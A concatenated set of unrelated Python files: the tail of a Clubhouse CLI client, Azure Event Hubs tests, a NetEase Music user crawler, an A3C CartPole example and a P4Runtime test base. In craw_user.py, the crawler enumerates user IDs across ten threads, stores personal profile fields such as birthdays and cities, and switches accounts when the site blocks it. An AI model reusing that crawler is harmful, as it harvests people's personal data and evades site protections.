str(user['is_speaker']),
str(user['is_moderator']),
)
# Check if the user is the speaker
if user['user_id'] == int(user_id):
channel_speaker_permission = bool(user['is_speaker'])
console.print(table)
# Check for the voice level.
if RTC:
token = channel_info['token']
RTC.joinChannel(token, channel_name, "", int(user_id))
RTC.startAudioRecording(
"./data/" + channel_info['topic'] + ".wav", 32000, 2)
else:
print("[!] Agora SDK is not installed.")
print(" You may not speak or listen to the conversation.")
# Activate pinging
client.active_ping(channel_name)
_ping_func = _ping_keep_alive(client, channel_name)
_wait_func = None
# Add raise_hands key bindings for speaker permission
# Sorry for the bad quality
if not channel_speaker_permission:
if sys.platform == "darwin": # OSX
_hotkey = "9"
elif sys.platform == "win32": # Windows
_hotkey = "ctrl+shift+h"
print(
f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
keyboard.add_hotkey(
_hotkey,
_request_speaker_permission,
args=(client, channel_name, user_id)
)
while True:
time.sleep(100)
channel_info = client.get_channel(channel_name)
if channel_info['should_leave'] == True or channel_info['success'] == False:
break
# Safely leave the channel upon quitting the channel.
if _ping_func:
_ping_func.set()
if _wait_func:
_wait_func.set()
if RTC:
RTC.leaveChannel()
RTC.stopAudioRecording()
client.leave_channel(channel_name)
def user_authentication(client):
""" (Clubhouse) -> NoneType
Just for authenticating the user.
"""
result = None
while True:
user_phone_number = input(
"[.] Please enter your phone number. (+818043217654) > ")
result = client.start_phone_number_auth(user_phone_number)
if not result['success']:
print(
f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
result = None
while True:
verification_code = input(
"[.] Please enter the SMS verification code (1234, 0000, ...) > ")
result = client.complete_phone_number_auth(
user_phone_number, verification_code)
if not result['success']:
print(
f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
user_id = result['user_profile']['user_id']
user_token = result['auth_token']
user_device = client.HEADERS.get("CH-DeviceId")
write_config(user_id, user_token, user_device)
print("[.] Writing configuration file complete.")
if result['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Authenticate user first and start doing something
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
if result['is_onboarding']:
process_onboarding(client)
return
def main():
"""
Initialize required configurations, start with some basic stuff.
"""
# Initialize configuration
client = None
user_config = read_config()
user_id = user_config.get('user_id')
user_token = user_config.get('user_token')
user_device = user_config.get('user_device')
# Check if user is authenticated
if user_id and user_token and user_device:
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
# Check if user is still on the waitlist
_check = client.check_waitlist_status()
if _check['is_waitlisted']:
print(
"[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Check if user has not signed up yet.
_check = client.me()
if not _check['user_profile'].get("username"):
process_onboarding(client)
chat_main(client)
else:
client = Clubhouse()
user_authentication(client)
main()
if __name__ == "__main__":
try:
main()
except Exception:
# Remove dump files on exit.
file_list = os.listdir(".")
for _file in file_list:
if _file.endswith(".dmp"):
os.remove(_file)
|
test_receive.py | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
import threading
import pytest
import time
import datetime
from azure.eventhub import EventData, TransportType, EventHubConsumerClient
from azure.eventhub.exceptions import EventHubError
@pytest.mark.liveTest
def test_receive_end_of_stream(connstr_senders):
def on_event(partition_context, event):
if partition_context.partition_id == "0":
assert event.body_as_str() == "Receiving only a single event"
assert list(event.body)[0] == b"Receiving only a single event"
on_event.called = True
on_event.called = False
connection_str, senders = connstr_senders
client = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
with client:
thread = threading.Thread(target=client.receive, args=(on_event,),
kwargs={"partition_id": "0", "starting_position": "@latest"})
thread.daemon = True
thread.start()
time.sleep(10)
assert on_event.called is False
senders[0].send(EventData(b"Receiving only a single event"))
time.sleep(10)
assert on_event.called is True
thread.join()
@pytest.mark.parametrize("position, inclusive, expected_result",
[("offset", False, "Exclusive"),
("offset", True, "Inclusive"),
("sequence", False, "Exclusive"),
("sequence", True, "Inclusive"),
("enqueued_time", False, "Exclusive")])
@pytest.mark.liveTest
def test_receive_with_event_position_sync(connstr_senders, position, inclusive, expected_result):
def on_event(partition_context, event):
assert partition_context.last_enqueued_event_properties.get('sequence_number') == event.sequence_number
assert partition_context.last_enqueued_event_properties.get('offset') == event.offset
assert partition_context.last_enqueued_event_properties.get('enqueued_time') == event.enqueued_time
assert partition_context.last_enqueued_event_properties.get('retrieval_time') is not None
if position == "offset":
on_event.event_position = event.offset
elif position == "sequence":
on_event.event_position = event.sequence_number
else:
on_event.event_position = event.enqueued_time
on_event.event = event
on_event.event_position = None
connection_str, senders = connstr_senders
senders[0].send(EventData(b"Inclusive"))
senders[1].send(EventData(b"Inclusive"))
client = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
with client:
thread = threading.Thread(target=client.receive, args=(on_event,),
kwargs={"starting_position": "-1",
"starting_position_inclusive": inclusive,
"track_last_enqueued_event_properties": True})
thread.daemon = True
thread.start()
time.sleep(10)
assert on_event.event_position is not None
thread.join()
senders[0].send(EventData(expected_result))
senders[1].send(EventData(expected_result))
client2 = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
with client2:
thread = threading.Thread(target=client2.receive, args=(on_event,),
kwargs={"starting_position": on_event.event_position,
"starting_position_inclusive": inclusive,
"track_last_enqueued_event_properties": True})
thread.daemon = True
thread.start()
time.sleep(10)
assert on_event.event.body_as_str() == expected_result
thread.join()
@pytest.mark.liveTest
def test_receive_owner_level(connstr_senders):
def on_event(partition_context, event):
pass
def on_error(partition_context, error):
on_error.error = error
on_error.error = None
connection_str, senders = connstr_senders
client1 = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
client2 = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
with client1, client2:
thread1 = threading.Thread(target=client1.receive, args=(on_event,),
kwargs={"partition_id": "0", "starting_position": "-1",
"on_error": on_error})
thread1.start()
for i in range(5):
ed = EventData("Event Number {}".format(i))
senders[0].send(ed)
time.sleep(10)
thread2 = threading.Thread(target=client2.receive, args=(on_event,),
kwargs = {"partition_id": "0", "starting_position": "-1", "owner_level": 1})
thread2.start()
for i in range(5):
ed = EventData("Event Number {}".format(i))
senders[0].send(ed)
time.sleep(20)
thread1.join()
thread2.join()
assert isinstance(on_error.error, EventHubError)
@pytest.mark.liveTest
def test_receive_over_websocket_sync(connstr_senders):
app_prop = {"raw_prop": "raw_value"}
content_type = "text/plain"
message_id_base = "mess_id_sample_"
def on_event(partition_context, event):
on_event.received.append(event)
on_event.app_prop = event.properties
on_event.received = []
on_event.app_prop = None
connection_str, senders = connstr_senders
client = EventHubConsumerClient.from_connection_string(connection_str,
consumer_group='$default',
transport_type=TransportType.AmqpOverWebsocket)
event_list = []
for i in range(5):
ed = EventData("Event Number {}".format(i))
ed.properties = app_prop
ed.content_type = content_type
ed.correlation_id = message_id_base
ed.message_id = message_id_base + str(i)
event_list.append(ed)
senders[0].send(event_list)
single_ed = EventData("Event Number {}".format(6))
single_ed.properties = app_prop
single_ed.content_type = content_type
single_ed.correlation_id = message_id_base
single_ed.message_id = message_id_base + str(6)
senders[0].send(single_ed)
with client:
thread = threading.Thread(target=client.receive, args=(on_event,),
kwargs={"partition_id": "0", "starting_position": "-1"})
thread.start()
time.sleep(10)
assert len(on_event.received) == 6
for ed in on_event.received:
assert ed.correlation_id == message_id_base
assert message_id_base in ed.message_id
assert ed.content_type == "text/plain"
assert ed.properties[b"raw_prop"] == b"raw_value"
|
craw_user.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: betta
'''
netease music api
'''
from api import NetEase
import MySQLdb
import time
import sys
import threading
from change_user import change_user
cookie_path = "~/.netease-music_api/cookie"
#login
joker = NetEase()
login_info = change_user()
print login_info
def save2sql(conn, data):
cur = conn.cursor()
if data:
try:
sql = (
"INSERT INTO netease_music_users (user_id, nick_name, signature, user_type, gender, follows, followeds, province, city, avatar_url, background_url, level, listen_songs, vip_type, expert_tags, people_can_see_playrecord, birthday) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
)
if data['profile']['birthday'] > 0:
time_tmp = time.localtime(data['profile']['birthday']/1000)
birthday = time.strftime("%Y-%m-%d %H:%M:%S", time_tmp)
else:
birthday = "1970-01-02 00:00:00"
if data['profile']['expertTags']:
expert_tags = '-'.join(data['profile']['expertTags'])
else:
expert_tags = ''
sql_data = (data['profile']['userId'], data['profile']['nickname'], data['profile']['signature'], data['profile']['userType'], data['profile']['gender'], data['profile']['follows'],\
data['profile']['followeds'], data['profile']['province'], data['profile']['city'], data['profile']['avatarUrl'], data['profile']['backgroundUrl'],\
data['level'], data['listenSongs'], data['profile']['vipType'], expert_tags, data['peopleCanSeeMyPlayRecord'], birthday)
print sql_data
cur.execute(sql, sql_data)
conn.commit()
except Exception, e:
print Exception, ":", e
def craw(start, limit):
print 'sub thread start!the thread name is:%s ' % threading.currentThread().getName()
conn = MySQLdb.Connect(host = '127.0.0.1',
user = 'root',
passwd = 'root',
db = 'netease',
charset = 'utf8')
# #sql = "SELECT song_id from netease_music_songs where id > (select song_id from netease_music_comments order by id desc limit 1)"
# sql = "SELECT song_id from netease_music_songs where id > 186664 order by id "
# cur.execute(sql)
# result=cur.fetchall()
for s in range(start, start+limit):
print "user_id %s" % (s)
detail = joker.user_detail(s)
print detail
print 'sub thread start!the thread name is:%s ' % threading.currentThread().getName()
if detail.get('code') == -460:
print 'change user'
try:
change_user()
except Exception, e:
print Exception, ":", e
elif detail.get('code') == 200:
save2sql(conn, detail)
else:
print "no detail %s" % (s)
time.sleep(1)
conn.close()
# class MyThread(threading.Thread):
# """
# 属性:
# target: 传入外部函数, 用户线程调用
# args: 函数参数
# """
# def __init__(self, target, args):
# super(MyThread, self).__init__() #调用父类的构造函数
# self.target = target
# self.args = args
# def run(self) :
# self.target(self.args)
def main():
start_number = int(sys.argv[1])
limit_number = int(sys.argv[2])
thread_list = [] #线程存放列表
for i in xrange(10):
t =threading.Thread(target=craw,args=(start_number+i*limit_number, limit_number))
t.setDaemon(True)
thread_list.append(t)
for t in thread_list:
t.start()
for t in thread_list:
t.join()
if __name__ == '__main__':
main()
|
A3C_distributed_tf.py | """
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example using distributed tensorflow + multiprocessing.
View more on my tutorial page: https://morvanzhou.github.io/
"""
import multiprocessing as mp
import tensorflow as tf
import numpy as np
import gym, time
import matplotlib.pyplot as plt
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
env = gym.make('CartPole-v0')
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
sess = None
def __init__(self, scope, opt_a=None, opt_c=None, global_net=None):
if scope == 'global_net': # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else:
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(
tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32),
axis=1, keep_dims=True)
exp_v = log_prob * td
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
axis=1, keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
self.global_step = tf.train.get_or_create_global_step()
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, global_net.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, global_net.c_params)]
with tf.name_scope('push'):
self.update_a_op = opt_a.apply_gradients(zip(self.a_grads, global_net.a_params), global_step=self.global_step)
self.update_c_op = opt_c.apply_gradients(zip(self.c_grads, global_net.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return a_prob, v, a_params, c_params
def choose_action(self, s): # run by a local
prob_weights = self.sess.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]),
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
def update_global(self, feed_dict): # run by a local
self.sess.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
self.sess.run([self.pull_a_params_op, self.pull_c_params_op])
def work(job_name, task_index, global_ep, lock, r_queue, global_running_r):
# set work's ip:port
cluster = tf.train.ClusterSpec({
"ps": ['localhost:2220', 'localhost:2221',],
"worker": ['localhost:2222', 'localhost:2223', 'localhost:2224', 'localhost:2225',]
})
server = tf.train.Server(cluster, job_name=job_name, task_index=task_index)
if job_name == 'ps':
print('Start Parameter Sever: ', task_index)
server.join()
else:
t1 = time.time()
env = gym.make('CartPole-v0').unwrapped
print('Start Worker: ', task_index)
with tf.device(tf.train.replica_device_setter(
worker_device="/job:worker/task:%d" % task_index,
cluster=cluster)):
opt_a = tf.train.RMSPropOptimizer(LR_A, name='opt_a')
opt_c = tf.train.RMSPropOptimizer(LR_C, name='opt_c')
global_net = ACNet('global_net')
local_net = ACNet('local_ac%d' % task_index, opt_a, opt_c, global_net)
# set training steps
hooks = [tf.train.StopAtStepHook(last_step=100000)]
with tf.train.MonitoredTrainingSession(master=server.target,
is_chief=True,
hooks=hooks,) as sess:
print('Start Worker Session: ', task_index)
local_net.sess = sess
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while (not sess.should_stop()) and (global_ep.value < 1000):
s = env.reset()
ep_r = 0
while True:
# if task_index:
# env.render()
a = local_net.choose_action(s)
s_, r, done, info = env.step(a)
if done: r = -5.
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = sess.run(local_net.v, {local_net.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(
buffer_v_target)
feed_dict = {
local_net.s: buffer_s,
local_net.a_his: buffer_a,
local_net.v_target: buffer_v_target,
}
local_net.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
local_net.pull_global()
s = s_
total_step += 1
if done:
if r_queue.empty(): # record running episode reward
global_running_r.value = ep_r
else:
global_running_r.value = .99 * global_running_r.value + 0.01 * ep_r
r_queue.put(global_running_r.value)
print(
"Task: %i" % task_index,
"| Ep: %i" % global_ep.value,
"| Ep_r: %i" % global_running_r.value,
"| Global_step: %i" % sess.run(local_net.global_step),
)
with lock:
global_ep.value += 1
break
print('Worker Done: ', task_index, time.time()-t1)
if __name__ == "__main__":
# use multiprocessing to create a local cluster with 2 parameter servers and 2 workers
global_ep = mp.Value('i', 0)
lock = mp.Lock()
r_queue = mp.Queue()
global_running_r = mp.Value('d', 0)
jobs = [
('ps', 0), ('ps', 1),
('worker', 0), ('worker', 1), ('worker', 2), ('worker', 3)
]
ps = [mp.Process(target=work, args=(j, i, global_ep, lock, r_queue, global_running_r), ) for j, i in jobs]
[p.start() for p in ps]
[p.join() for p in ps[2:]]
ep_r = []
while not r_queue.empty():
ep_r.append(r_queue.get())
plt.plot(np.arange(len(ep_r)), ep_r)
plt.title('Distributed training')
plt.xlabel('Step')
plt.ylabel('Total moving reward')
plt.show()
|
base_test.py | # Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Antonin Bas (antonin@barefootnetworks.com)
#
#
import Queue
import sys
import threading
import time
from StringIO import StringIO
from collections import Counter
from functools import wraps, partial
from unittest import SkipTest
import google.protobuf.text_format
import grpc
import ptf
import ptf.testutils as testutils
import scapy.packet
import scapy.utils
from google.rpc import status_pb2, code_pb2
from p4.config.v1 import p4info_pb2
from p4.v1 import p4runtime_pb2
from ptf import config
from ptf.base_tests import BaseTest
from ptf.dataplane import match_exp_pkt
# See https://gist.github.com/carymrobbins/8940382
# functools.partialmethod is introduced in Python 3.4
class partialmethod(partial):
def __get__(self, instance, owner):
if instance is None:
return self
return partial(self.func, instance,
*(self.args or ()), **(self.keywords or {}))
# Convert integer (with length) to binary byte string
# Equivalent to Python 3.2 int.to_bytes
# See
# https://stackoverflow.com/questions/16022556/has-python-3-to-bytes-been-back-ported-to-python-2-7
def stringify(n, length):
h = '%x' % n
s = ('0' * (len(h) % 2) + h).zfill(length * 2).decode('hex')
return s
def ipv4_to_binary(addr):
bytes_ = [int(b, 10) for b in addr.split('.')]
return "".join(chr(b) for b in bytes_)
def mac_to_binary(addr):
bytes_ = [int(b, 16) for b in addr.split(':')]
return "".join(chr(b) for b in bytes_)
def format_pkt_match(received_pkt, expected_pkt):
# Taken from PTF dataplane class
stdout_save = sys.stdout
try:
# The scapy packet dissection methods print directly to stdout,
# so we have to redirect stdout to a string.
sys.stdout = StringIO()
print "========== EXPECTED =========="
if isinstance(expected_pkt, scapy.packet.Packet):
scapy.packet.ls(expected_pkt)
print '--'
scapy.utils.hexdump(expected_pkt)
print "========== RECEIVED =========="
if isinstance(received_pkt, scapy.packet.Packet):
scapy.packet.ls(received_pkt)
print '--'
scapy.utils.hexdump(received_pkt)
print "=============================="
return sys.stdout.getvalue()
finally:
sys.stdout.close()
sys.stdout = stdout_save # Restore the original stdout.
# Used to indicate that the gRPC error Status object returned by the server has
# an incorrect format.
class P4RuntimeErrorFormatException(Exception):
def __init__(self, message):
super(P4RuntimeErrorFormatException, self).__init__(message)
# Used to iterate over the p4.Error messages in a gRPC error Status object
class P4RuntimeErrorIterator:
def __init__(self, grpc_error):
assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
self.grpc_error = grpc_error
error = None
# The gRPC Python package does not have a convenient way to access the
# binary details for the error: they are treated as trailing metadata.
for meta in self.grpc_error.trailing_metadata():
if meta[0] == "grpc-status-details-bin":
error = status_pb2.Status()
error.ParseFromString(meta[1])
break
if error is None:
raise P4RuntimeErrorFormatException("No binary details field")
if len(error.details) == 0:
raise P4RuntimeErrorFormatException(
"Binary details field has empty Any details repeated field")
self.errors = error.details
self.idx = 0
def __iter__(self):
return self
def next(self):
while self.idx < len(self.errors):
p4_error = p4runtime_pb2.Error()
one_error_any = self.errors[self.idx]
if not one_error_any.Unpack(p4_error):
raise P4RuntimeErrorFormatException(
"Cannot convert Any message to p4.Error")
if p4_error.canonical_code == code_pb2.OK:
continue
v = self.idx, p4_error
self.idx += 1
return v
raise StopIteration
# P4Runtime uses a 3-level message in case of an error during the processing of
# a write batch. This means that if we do not wrap the grpc.RpcError inside a
# custom exception, we can end-up with a non-helpful exception message in case
# of failure as only the first level will be printed. In this custom exception
# class, we extract the nested error message (one for each operation included in
# the batch) in order to print error code + user-facing message. See P4 Runtime
# documentation for more details on error-reporting.
class P4RuntimeWriteException(Exception):
def __init__(self, grpc_error):
assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
super(P4RuntimeWriteException, self).__init__()
self.errors = []
try:
error_iterator = P4RuntimeErrorIterator(grpc_error)
for error_tuple in error_iterator:
self.errors.append(error_tuple)
except P4RuntimeErrorFormatException:
raise # just propagate exception for now
def __str__(self):
message = "Error(s) during Write:\n"
for idx, p4_error in self.errors:
code_name = code_pb2._CODE.values_by_number[
p4_error.canonical_code].name
message += "\t* At index {}: {}, '{}'\n".format(
idx, code_name, p4_error.message)
return message
# This code is common to all tests. setUp() is invoked at the beginning of the
# test and tearDown is called at the end, no matter whether the test passed /
# failed / errored.
# noinspection PyUnresolvedReferences
class P4RuntimeTest(BaseTest):
def setUp(self):
BaseTest.setUp(self)
# Setting up PTF dataplane
self.dataplane = ptf.dataplane_instance
self.dataplane.flush()
self._swports = []
for device, port, ifname in config["interfaces"]:
self._swports.append(port)
grpc_addr = testutils.test_param_get("grpcaddr")
if grpc_addr is None:
grpc_addr = 'localhost:50051'
self.device_id = int(testutils.test_param_get("device_id"))
if self.device_id is None:
self.fail("Device ID is not set")
self.cpu_port = int(testutils.test_param_get("cpu_port"))
if self.cpu_port is None:
self.fail("CPU port is not set")
pltfm = testutils.test_param_get("pltfm")
if pltfm is not None and pltfm == 'hw' and getattr(self, "_skip_on_hw", False):
raise SkipTest("Skipping test in HW")
self.channel = grpc.insecure_channel(grpc_addr)
self.stub = p4runtime_pb2.P4RuntimeStub(self.channel)
proto_txt_path = testutils.test_param_get("p4info")
# print "Importing p4info proto from", proto_txt_path
self.p4info = p4info_pb2.P4Info()
with open(proto_txt_path, "rb") as fin:
google.protobuf.text_format.Merge(fin.read(), self.p4info)
self.import_p4info_names()
# used to store write requests sent to the P4Runtime server, useful for
# autocleanup of tests (see definition of autocleanup decorator below)
self.reqs = []
self.election_id = 1
self.set_up_stream()
# In order to make writing tests easier, we accept any suffix that uniquely
# identifies the object among p4info objects of the same type.
def import_p4info_names(self):
self.p4info_obj_map = {}
suffix_count = Counter()
for p4_obj_type in ["tables", "action_profiles", "actions", "counters",
"direct_counters"]:
for obj in getattr(self.p4info, p4_obj_type):
pre = obj.preamble
suffix = None
for s in reversed(pre.name.split(".")):
suffix = s if suffix is None else s + "." + suffix
key = (p4_obj_type, suffix)
self.p4info_obj_map[key] = obj
suffix_count[key] += 1
for key, c in suffix_count.items():
if c > 1:
del self.p4info_obj_map[key]
def set_up_stream(self):
self.stream_out_q = Queue.Queue()
self.stream_in_q = Queue.Queue()
def stream_req_iterator():
while True:
p = self.stream_out_q.get()
if p is None:
break
yield p
def stream_recv(stream):
for p in stream:
self.stream_in_q.put(p)
self.stream = self.stub.StreamChannel(stream_req_iterator())
self.stream_recv_thread = threading.Thread(
target=stream_recv, args=(self.stream,))
self.stream_recv_thread.start()
self.handshake()
def handshake(self):
req = p4runtime_pb2.StreamMessageRequest()
arbitration = req.arbitration
arbitration.device_id = self.device_id
election_id = arbitration.election_id
election_id.high = 0
election_id.low = self.election_id
self.stream_out_q.put(req)
rep = self.get_stream_packet("arbitration", timeout=2)
if rep is None:
self.fail("Failed to establish handshake")
def tearDown(self):
self.tear_down_stream()
BaseTest.tearDown(self)
def tear_down_stream(self):
self.stream_out_q.put(None)
self.stream_recv_thread.join()
def get_packet_in(self, timeout=2):
msg = self.get_stream_packet("packet", timeout)
if msg is None:
self.fail("Packet in not received")
else:
return msg.packet
def verify_packet_in(self, exp_pkt, exp_in_port, timeout=2):
pkt_in_msg = self.get_packet_in(timeout=timeout)
in_port_ = stringify(exp_in_port, 2)
rx_in_port_ = pkt_in_msg.metadata[0].value
if in_port_ != rx_in_port_:
rx_inport = struct.unpack("!h", rx_in_port_)[0]
self.fail("Wrong packet-in ingress port, expected {} but received was {}"
.format(exp_in_port, rx_inport))
rx_pkt = Ether(pkt_in_msg.payload)
if not match_exp_pkt(exp_pkt, rx_pkt):
self.fail("Received packet-in is not the expected one\n" + format_pkt_match(rx_pkt, exp_pkt))
def get_stream_packet(self, type_, timeout=1):
start = time.time()
try:
while True:
remaining = timeout - (time.time() - start)
if remaining < 0:
break
msg = self.stream_in_q.get(timeout=remaining)
if not msg.HasField(type_):
continue
return msg
except: # timeout expired
pass
return None
def send_packet_out(self, packet):
packet_out_req = p4runtime_pb2.StreamMessageRequest()
packet_out_req.packet.CopyFrom(packet)
self.stream_out_q.put(packet_out_req)
def swports(self, idx):
if idx >= len(self._swports):
self.fail("Index {} is out-of-bound of port map".format(idx))
return self._swports[idx]
def get_obj(self, p4_obj_type, p4_name):
key = (p4_obj_type, p4_name)
obj = self.p4info_obj_map.get(key, None)
if obj is None:
raise Exception("Unable to find %s '%s' in p4info" % (p4_obj_type, p4_name))
return obj
def get_obj_id(self, p4_obj_type, p4_name):
obj = self.get_obj(p4_obj_type, p4_name)
return obj.preamble.id
def get_param_id(self, action_name, param_name):
a = self.get_obj("actions", action_name)
for p in a.params:
if p.name == param_name:
return p.id
raise Exception("Param '%s' not found in action '%s'" % (param_name, action_name))
def get_mf_id(self, table_name, mf_name):
t = self.get_obj("tables", table_name)
if t is None:
return None
for mf in t.match_fields:
if mf.name == mf_name:
return mf.id
raise Exception("Match field '%s' not found in table '%s'" % (mf_name, table_name))
# These are attempts at convenience functions aimed at making writing
# P4Runtime PTF tests easier.
class MF(object):
def __init__(self, mf_name):
self.name = mf_name
class Exact(MF):
def __init__(self, mf_name, v):
super(P4RuntimeTest.Exact, self).__init__(mf_name)
self.v = v
def add_to(self, mf_id, mk):
mf = mk.add()
mf.field_id = mf_id
mf.exact.value = self.v
class Lpm(MF):
def __init__(self, mf_name, v, pLen):
super(P4RuntimeTest.Lpm, self).__init__(mf_name)
self.v = v
self.pLen = pLen
def add_to(self, mf_id, mk):
# P4Runtime mandates that the match field should be omitted for
# "don't care" LPM matches (i.e. when prefix length is zero)
if self.pLen == 0:
return
mf = mk.add()
mf.field_id = mf_id
mf.lpm.prefix_len = self.pLen
mf.lpm.value = ''
# P4Runtime now has strict rules regarding ternary matches: in the
# case of LPM, trailing bits in the value (after prefix) must be set
# to 0.
first_byte_masked = self.pLen / 8
for i in xrange(first_byte_masked):
mf.lpm.value += self.v[i]
if first_byte_masked == len(self.v):
return
r = self.pLen % 8
mf.lpm.value += chr(
ord(self.v[first_byte_masked]) & (0xff << (8 - r)))
for i in range(first_byte_masked + 1, len(self.v)):
mf.lpm.value += '\x00'
class Ternary(MF):
def __init__(self, mf_name, v, mask):
super(P4RuntimeTest.Ternary, self).__init__(mf_name)
self.v = v
self.mask = mask
def add_to(self, mf_id, mk):
# P4Runtime mandates that the match field should be omitted for
# "don't care" ternary matches (i.e. when mask is zero)
if all(c == '\x00' for c in self.mask):
return
mf = mk.add()
mf.field_id = mf_id
assert (len(self.mask) == len(self.v))
mf.ternary.mask = self.mask
mf.ternary.value = ''
# P4Runtime now has strict rules regarding ternary matches: in the
# case of Ternary, "don't-care" bits in the value must be set to 0
for i in xrange(len(self.mask)):
mf.ternary.value += chr(ord(self.v[i]) & ord(self.mask[i]))
class Range(MF):
def __init__(self, mf_name, low, high):
super(P4RuntimeTest.Range, self).__init__(mf_name)
self.low = low
self.high = high
def add_to(self, mf_id, mk):
# P4Runtime mandates that the match field should be omitted for
# "don't care" range matches (i.e. when all possible values are
# included in the range)
# TODO(antonin): negative values?
low_is_zero = all(c == '\x00' for c in self.low)
high_is_max = all(c == '\xff' for c in self.high)
if low_is_zero and high_is_max:
return
mf = mk.add()
mf.field_id = mf_id
assert (len(self.high) == len(self.low))
mf.range.low = self.low
mf.range.high = self.high
# Sets the match key for a p4::TableEntry object. mk needs to be an iterable
# object of MF instances
def set_match_key(self, table_entry, t_name, mk):
for mf in mk:
mf_id = self.get_mf_id(t_name, mf.name)
mf.add_to(mf_id, table_entry.match)
def set_action(self, action, a_name, params):
action.action_id = self.get_action_id(a_name)
for p_name, v in params:
param = action.params.add()
param.param_id = self.get_param_id(a_name, p_name)
param.value = v
# Sets the action & action data for a p4::TableEntry object. params needs to
# be an iterable object of 2-tuples (<param_name>, <value>).
def set_action_entry(self, table_entry, a_name, params):
self.set_action(table_entry.action.action, a_name, params)
def _write(self, req):
try:
return self.stub.Write(req)
except grpc.RpcError as e:
if e.code() != grpc.StatusCode.UNKNOWN:
raise e
raise P4RuntimeWriteException(e)
def write_request(self, req, store=True):
rep = self._write(req)
if store:
self.reqs.append(req)
return rep
def get_new_write_request(self):
req = p4runtime_pb2.WriteRequest()
req.device_id = self.device_id
election_id = req.election_id
election_id.high = 0
election_id.low = self.election_id
return req
#
# Convenience functions to build and send P4Runtime write requests
#
def _push_update_member(self, req, ap_name, mbr_id, a_name, params,
update_type):
update = req.updates.add()
update.type = update_type
ap_member = update.entity.action_profile_member
ap_member.action_profile_id = self.get_ap_id(ap_name)
ap_member.member_id = mbr_id
self.set_action(ap_member.action, a_name, params)
def push_update_add_member(self, req, ap_name, mbr_id, a_name, params):
self._push_update_member(req, ap_name, mbr_id, a_name, params,
